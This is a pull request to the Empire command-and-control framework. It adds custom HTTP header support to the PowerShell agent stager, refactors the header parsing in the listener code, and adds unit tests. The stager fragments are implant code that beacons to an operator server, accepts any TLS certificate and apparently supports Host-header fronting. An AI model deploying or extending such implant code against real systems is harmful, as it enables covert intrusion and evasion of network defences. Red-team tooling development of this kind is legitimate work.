### PR TITLE
Support for custom headers in powershell stager for http listeners

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 -   Fixed background jobs for the python agent.
+-   Fixed custom headers for the http listener powershell stager.
 
 ## [6.7.1] - 2026-07-25
 -   Updated Starkiller to v3.6.0

--- a/empire/server/data/agent/stagers/http/comms.ps1
+++ b/empire/server/data/agent/stagers/http/comms.ps1
@@ -8,6 +8,11 @@ $Script:ServerIndex = 0;
 $Script:Skbytes = [byte[]]@({{ agent_private_cert_key }})
 $Script:pk = [byte[]]@({{ agent_public_cert_key }})
 $Script:serverPubBytes = [byte[]]@({{ server_public_cert_key  }})
+$Script:Headers = @{
+{% for name, value in custom_headers.items() %}
+    '{{ name }}' = '{{ value }}';
+{% endfor %}
+}
 
 if($server.StartsWith('https')){
     [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

--- a/empire/server/data/agent/stagers/http/http.ps1
+++ b/empire/server/data/agent/stagers/http/http.ps1
@@ -652,6 +652,14 @@ function Start-Negotiate {
     if ($Script:Proxy) { $wc.Proxy = $Script:Proxy }
     $wc.Headers.Clear()
     $wc.Headers.Add('User-Agent', $UA)
+    if($Script:Headers){
+        $Script:Headers.GetEnumerator() | ForEach-Object {
+            if($_.Name.ToLower() -eq 'host'){
+                try{ $ig = $wc.DownloadData($s) } catch { }
+            }
+            $wc.Headers.Add($_.Name, $_.Value)
+        }
+    }
 
     # session id (8 bytes ASCII)
     $ID='00000000'
@@ -725,6 +733,14 @@ function Start-Negotiate {
     $wc.Headers.Clear()
     $wc.Headers.Add('User-Agent', $UA)
     $wc.Headers.Add('Hop-Name', $hop)
+    if($Script:Headers){
+        $Script:Headers.GetEnumerator() | ForEach-Object {
+            if($_.Name.ToLower() -eq 'host'){
+                try{ $ig = $wc.DownloadData($s) } catch { }
+            }
+            $wc.Headers.Add($_.Name, $_.Value)
+        }
+    }
 
     # stage_2: ChaCha20-Poly1305 routing with AES/HMAC(SessionKey) body
     $chachaPkt2 = Build-ChaChaRoutingPacket -StagingKeyBytes $SKB -SessionId8 $ID -Language 1 -Meta 3 -Additional 0 -EncData $eb2

--- a/empire/server/listeners/http.py
+++ b/empire/server/listeners/http.py
@@ -26,6 +26,24 @@ LOG_NAME_PREFIX = __name__
 log = logging.getLogger(__name__)
 
 
+def parse_custom_headers(header_entries: list[str]) -> dict[str, str]:
+    """Parse "Key:Value" entries from a profile tail into a dict.
+
+    Entries without a colon are treated as empty-value headers.
+    """
+    result: dict[str, str] = {}
+    for entry in header_entries:
+        if not entry:
+            continue
+        parts = entry.split(":")
+        key = parts[0]
+        if not key or key.lower() == "cookie":
+            continue
+        value = parts[1] if len(parts) >= 2 else ""
+        result[key] = value
+    return result
+
+
 class Listener:
     def __init__(self, mainMenu: MainMenu):
         self.info = {
@@ -530,6 +548,7 @@ class Listener:
         workingHours = listenerOptions["WorkingHours"]["Value"]
         killDate = listenerOptions["KillDate"]["Value"]
         customHeaders = profile.split("|")[2:]
+        custom_headers_dict = parse_custom_headers(customHeaders)
 
         # select some random URIs for staging from the main profile
         stage1 = random.choice(uris)
@@ -576,21 +595,9 @@ class Listener:
                 "agent_private_cert_key": private_key_array,
                 "server_public_cert_key": server_public_key_array,
                 "agent_public_cert_key": public_key_array,
+                "custom_headers": custom_headers_dict,
             }
             stager = template.render(template_options)
-
-            # Patch in custom Headers
-            remove = []
-            if customHeaders != []:
-                for key in customHeaders:
-                    value = key.split(":")
-                    if "cookie" in value[0].lower() and value[1]:
-                        continue
-                    remove += value
-                headers = ",".join(remove)
-                stager = stager.replace(
-                    '$customHeaders = "";', f'$customHeaders = "{headers}";'
-                )
 
             if obfuscate:
                 stager = self.mainMenu.obfuscationv2.obfuscate(
@@ -748,11 +755,14 @@ class Listener:
             )
 
             powershell_array = ",".join(f"0x{b:02x}" for b in raw_key_bytes)
+            profile = self.options["DefaultProfile"]["Value"]
+            custom_headers_dict = parse_custom_headers(profile.split("|")[2:])
             template_options = {
                 "session_cookie": self.session_cookie,
                 "host": self.host_address,
                 "agent_private_cert_key": powershell_array,
                 "agent_public_cert_key": self.agent_public_cert_key,
+                "custom_headers": custom_headers_dict,
             }
 
             return template.render(template_options)

--- a/empire/server/listeners/http_hop.py
+++ b/empire/server/listeners/http_hop.py
@@ -8,6 +8,7 @@ from cryptography.hazmat.primitives import serialization
 
 from empire.server.common import helpers, packets, templating
 from empire.server.common.empire import MainMenu
+from empire.server.listeners.http import parse_custom_headers
 from empire.server.utils import data_util, listener_util
 
 LOG_NAME_PREFIX = __name__
@@ -342,6 +343,7 @@ class Listener:
         workingHours = listener.options["WorkingHours"]["Value"]
         killDate = listener.options["KillDate"]["Value"]
         customHeaders = profile.split("|")[2:]
+        custom_headers_dict = parse_custom_headers(customHeaders)
         session_cookie = listener.options["Cookie"]["Value"]
 
         # select some random URIs for staging from the main profile
@@ -393,21 +395,9 @@ class Listener:
                 "agent_private_cert_key": private_key_array,
                 "server_public_cert_key": server_public_key_array,
                 "agent_public_cert_key": public_key_array,
+                "custom_headers": custom_headers_dict,
             }
             stager = template.render(template_options)
-
-            # Patch in custom Headers
-            remove = []
-            if customHeaders != []:
-                for key in customHeaders:
-                    value = key.split(":")
-                    if "cookie" in value[0].lower() and value[1]:
-                        continue
-                    remove += value
-                headers = ",".join(remove)
-                stager = stager.replace(
-                    '$customHeaders = "";', f'$customHeaders = "{headers}";'
-                )
 
             if obfuscate:
                 stager = self.mainMenu.obfuscationv2.obfuscate(
@@ -492,11 +482,14 @@ class Listener:
             )
 
             powershell_array = ",".join(f"0x{b:02x}" for b in raw_key_bytes)
+            profile = self.options["DefaultProfile"]["Value"]
+            custom_headers_dict = parse_custom_headers(profile.split("|")[2:])
             template_options = {
                 "session_cookie": "",
                 "host": self.host_address,
                 "agent_private_cert_key": powershell_array,
                 "agent_public_cert_key": self.agent_public_cert_key,
+                "custom_headers": custom_headers_dict,
             }
 
             return template.render(template_options)

--- a/empire/server/listeners/port_forward_pivot.py
+++ b/empire/server/listeners/port_forward_pivot.py
@@ -6,6 +6,7 @@ import random
 from empire.server.common import helpers, packets, templating
 from empire.server.common.empire import MainMenu
 from empire.server.core.db.base import SessionLocal
+from empire.server.listeners.http import parse_custom_headers
 from empire.server.utils import data_util, listener_util
 
 LOG_NAME_PREFIX = __name__
@@ -387,6 +388,7 @@ class Listener:
         killDate = listenerOptions["KillDate"]["Value"]
         host = listenerOptions["Host"]["Value"]
         customHeaders = profile.split("|")[2:]
+        custom_headers_dict = parse_custom_headers(customHeaders)
 
         # select some random URIs for staging from the main profile
         stage1 = random.choice(uris)
@@ -409,21 +411,9 @@ class Listener:
                 "host": host,
                 "stage_1": stage1,
                 "stage_2": stage2,
+                "custom_headers": custom_headers_dict,
             }
             stager = template.render(template_options)
-
-            # Patch in custom Headers
-            remove = []
-            if customHeaders != []:
-                for key in customHeaders:
-                    value = key.split(":")
-                    if "cookie" in value[0].lower() and value[1]:
-                        continue
-                    remove += value
-                headers = ",".join(remove)
-                stager = stager.replace(
-                    '$customHeaders = "";', f'$customHeaders = "{headers}";'
-                )
 
             stagingKey = stagingKey.encode("UTF-8")
             stager = listener_util.remove_lines_comments(stager)
@@ -597,9 +587,12 @@ class Listener:
             eng = templating.TemplateEngine(template_path)
             template = eng.get_template("http/http.ps1")
 
+            profile = self.options["DefaultProfile"]["Value"]
+            custom_headers_dict = parse_custom_headers(profile.split("|")[2:])
             template_options = {
                 "session_cookie": self.session_cookie,
                 "host": self.host_address,
+                "custom_headers": custom_headers_dict,
             }
 
             return template.render(template_options)

--- a/empire/test/test_listener_generate_stager.py
+++ b/empire/test/test_listener_generate_stager.py
@@ -1,0 +1,190 @@
+from pathlib import Path
+from unittest.mock import MagicMock, Mock
+
+import pytest
+
+from empire.server.listeners.http import Listener as HttpListener
+from empire.server.listeners.http import parse_custom_headers
+from empire.server.listeners.http_hop import Listener as HttpHopListener
+from empire.server.listeners.port_forward_pivot import Listener as PfpListener
+
+
+@pytest.fixture(scope="module", autouse=True)
+def _setup_staging_key(session_local, models):
+    with session_local.begin() as db:
+        config = db.query(models.Config).first()
+        config.staging_key = "@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}"
+
+
+@pytest.fixture
+def main_menu_mock(install_path):
+    main_menu = Mock()
+    main_menu.installPath = ""
+    main_menu.install_path = Path(install_path)
+    main_menu.listeners.activeListeners = {}
+    main_menu.listeners.listeners = {}
+    return main_menu
+
+
+class TestParseCustomHeaders:
+    def test_basic_headers(self):
+        assert parse_custom_headers(["X-Foo:bar", "X-Baz:qux"]) == {
+            "X-Foo": "bar",
+            "X-Baz": "qux",
+        }
+
+    def test_empty_list(self):
+        assert parse_custom_headers([]) == {}
+
+    def test_skips_cookie(self):
+        assert parse_custom_headers(["X-Foo:bar", "Cookie:session=abc"]) == {
+            "X-Foo": "bar"
+        }
+
+    def test_skips_cookie_case_insensitive(self):
+        assert parse_custom_headers(["cookie:x"]) == {}
+        assert parse_custom_headers(["COOKIE:x"]) == {}
+
+    def test_skips_empty_entries(self):
+        assert parse_custom_headers(["", "X-Foo:bar", ""]) == {"X-Foo": "bar"}
+
+    def test_entry_without_colon_becomes_empty_value(self):
+        assert parse_custom_headers(["X-Foo"]) == {"X-Foo": ""}
+
+    def test_entry_with_empty_value(self):
+        assert parse_custom_headers(["X-Foo:"]) == {"X-Foo": ""}
+
+    def test_skips_empty_key(self):
+        assert parse_custom_headers([":value"]) == {}
+
+
+def _default_profile_with_headers():
+    return (
+        "/admin/get.php,/news.php|"
+        "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|"
+        "X-Foo:bar|X-Baz:qux"
+    )
+
+
+def test_http_generate_stager_powershell_injects_custom_headers(
+    monkeypatch, main_menu_mock
+):
+    http_listener = HttpListener(main_menu_mock)
+    http_listener.options["Host"]["Value"] = "http://localhost"
+    http_listener.host_address = "http://localhost/"
+    http_listener.options["DefaultProfile"]["Value"] = _default_profile_with_headers()
+
+    stager = http_listener.generate_stager(
+        listenerOptions=http_listener.options, language="powershell"
+    )
+
+    assert "$Script:Headers = @{" in stager
+    assert "'X-Foo' = 'bar';" in stager
+    assert "'X-Baz' = 'qux';" in stager
+
+
+def test_http_generate_stager_powershell_no_custom_headers_renders_empty_hashtable(
+    monkeypatch, main_menu_mock
+):
+    http_listener = HttpListener(main_menu_mock)
+    http_listener.options["Host"]["Value"] = "http://localhost"
+    http_listener.host_address = "http://localhost/"
+    http_listener.options["DefaultProfile"]["Value"] = (
+        "/admin/get.php,/news.php|Mozilla/5.0"
+    )
+
+    stager = http_listener.generate_stager(
+        listenerOptions=http_listener.options, language="powershell"
+    )
+
+    assert "$Script:Headers = @{" in stager
+    # No hashtable entries when profile carries no custom headers.
+    headers_block = stager.split("$Script:Headers = @{")[1].split("}")[0]
+    assert headers_block.strip() == ""
+
+
+def test_http_generate_stager_powershell_skips_cookie_from_profile(
+    monkeypatch, main_menu_mock
+):
+    http_listener = HttpListener(main_menu_mock)
+    http_listener.options["Host"]["Value"] = "http://localhost"
+    http_listener.host_address = "http://localhost/"
+    http_listener.options["DefaultProfile"]["Value"] = (
+        "/admin/get.php|Mozilla/5.0|Cookie:evil=1|X-Foo:bar"
+    )
+
+    stager = http_listener.generate_stager(
+        listenerOptions=http_listener.options, language="powershell"
+    )
+
+    headers_block = stager.split("$Script:Headers = @{")[1].split("}")[0]
+    assert "'X-Foo' = 'bar';" in headers_block
+    assert "Cookie" not in headers_block
+
+
+def test_http_generate_comms_powershell_injects_custom_headers(
+    monkeypatch, main_menu_mock
+):
+    http_listener = HttpListener(main_menu_mock)
+    http_listener.options["Host"]["Value"] = "http://localhost"
+    http_listener.host_address = "http://localhost/"
+    http_listener.options["DefaultProfile"]["Value"] = (
+        "/admin/get.php|Mozilla/5.0|X-Foo:bar"
+    )
+
+    comms = http_listener.generate_comms(
+        listenerOptions=http_listener.options, language="powershell"
+    )
+
+    assert "$Script:Headers = @{" in comms
+    assert "'X-Foo' = 'bar';" in comms
+
+
+def test_http_hop_generate_stager_powershell_injects_custom_headers(
+    monkeypatch, main_menu_mock
+):
+    random_mock = MagicMock()
+    random_mock.choice.side_effect = lambda x: x[0]
+    monkeypatch.setattr("empire.server.listeners.http_hop.random", random_mock)
+
+    # Redirect listener supplies the profile and cert material.
+    redirect_listener = HttpListener(main_menu_mock)
+    redirect_listener.options["DefaultProfile"]["Value"] = (
+        _default_profile_with_headers()
+    )
+
+    listenersv2 = MagicMock()
+    listenersv2.get_active_listener_by_name.return_value = redirect_listener
+    main_menu_mock.listenersv2 = listenersv2
+
+    http_hop_listener = HttpHopListener(main_menu_mock)
+    http_hop_listener.options["Host"]["Value"] = "http://localhost"
+    http_hop_listener.host_address = "http://localhost/"
+    http_hop_listener.options["RedirectListener"]["Value"] = "http1"
+
+    stager = http_hop_listener.generate_stager(
+        listenerOptions=http_hop_listener.options, language="powershell"
+    )
+
+    assert "$Script:Headers = @{" in stager
+    assert "'X-Foo' = 'bar';" in stager
+    assert "'X-Baz' = 'qux';" in stager
+
+
+def test_port_forward_pivot_generate_stager_powershell_injects_custom_headers(
+    monkeypatch, main_menu_mock
+):
+    pfp = PfpListener(main_menu_mock)
+    # Port-forward pivot copies options from its parent HTTP listener at start().
+    pfp.options.update(HttpListener(main_menu_mock).options)
+    pfp.options["Host"] = {"Value": "http://localhost"}
+    pfp.options["Port"] = {"Value": "80"}
+    pfp.host_address = "http://localhost/"
+    pfp.session_cookie = "session"
+    pfp.options["DefaultProfile"]["Value"] = _default_profile_with_headers()
+
+    stager = pfp.generate_stager(listenerOptions=pfp.options, language="powershell")
+
+    assert "$Script:Headers = @{" in stager
+    assert "'X-Foo' = 'bar';" in stager
+    assert "'X-Baz' = 'qux';" in stager


### PR DESCRIPTION
## Describe your changes

- Populating a dict in comms.ps1 with custom headers so that stagers maintain the custom headers set by the operator.

## Issue ticket number and link (if there is one)

https://github.com/BC-SECURITY/Empire/issues/831

## Checklist before requesting a review
- [X] I have performed a self-review of my code
- [X] If it is a core feature, I have added thorough tests.
- [X] I have added an entry to `CHANGELOG.md`
- [-] I have updated the documentation in `docs/` (if applicable)
